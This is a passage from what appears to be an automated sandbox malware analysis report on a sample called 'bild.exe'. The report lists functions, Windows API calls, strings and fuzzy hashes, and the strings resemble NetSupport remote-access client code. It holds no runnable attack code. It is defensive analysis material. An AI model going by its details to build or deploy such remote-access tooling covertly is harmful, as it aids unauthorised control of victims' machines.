                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                    • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                    • API String ID: 3360349984-1136101629
                                                                                    • Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                    • Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
                                                                                    • Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                    • Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64
                                                                                    Function 11031960 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf
                                                                                    • String ID: %s%s%s.bin$364339$_HF$_HW$_SW
                                                                                    • API String ID: 2111968516-754603740
                                                                                    • Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                    • Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
                                                                                    • Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                    • Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
                                                                                    Function 11102AB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
                                                                                    • GetStockObject.GDI32(00000004), ref: 11102B5B
                                                                                    • RegisterClassA.USER32(?), ref: 11102B6F
                                                                                    • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                    • String ID: NSMDesktopWnd
                                                                                    • API String ID: 2669163067-206650970
                                                                                    • Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                    • Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
                                                                                    • Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                    • Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94
                                                                                    Function 1113CC30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
                                                                                    • KillTimer.USER32(00000000,00007F5E,TermUI...), ref: 1113CCB3
                                                                                    • FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113CD2B
                                                                                    • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeKillLibraryTimer
                                                                                    • String ID: TermUI
                                                                                    • API String ID: 2006562601-4085834059
                                                                                    • Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                    • Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
                                                                                    • Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                    • Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91
                                                                                    Function 11145330 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                    • API String ID: 47109696-3245241687
                                                                                    • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                    • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
                                                                                    • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                    • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                    Function 111114D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                      • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                      • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                    • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                    • API String ID: 806825551-1858614750
                                                                                    • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                    • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                    • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                    • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
                                                                                    Function 11144200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                      • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Public\Videos\Video\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                    • ResetEvent.KERNEL32(00000104), ref: 11144269
                                                                                    • SetEvent.KERNEL32(00000104), ref: 1114427F
                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                    • String ID: MiniDump
                                                                                    • API String ID: 1494854734-2840755058
                                                                                    • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                    • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                    • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                    • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                    Function 11146DA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
                                                                                    • wsprintfA.USER32 ref: 11146E06
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                    • API String ID: 1985783259-2296142801
                                                                                    • Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                    • Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
                                                                                    • Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                    • Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
                                                                                    Function 1110F420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                      • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                      • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                    • wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • _memset.LIBCMT ref: 1110F477
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                    • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                    • API String ID: 3234921582-2664294811
                                                                                    • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                    • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
                                                                                    • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                    • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                    Function 11145AE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                      • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                      • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                      • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                    • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                    • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                    • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                    • API String ID: 1108920153-1959555903
                                                                                    • Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                    • Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
                                                                                    • Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                    • Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
                                                                                    Function 11031870 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 11031926
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
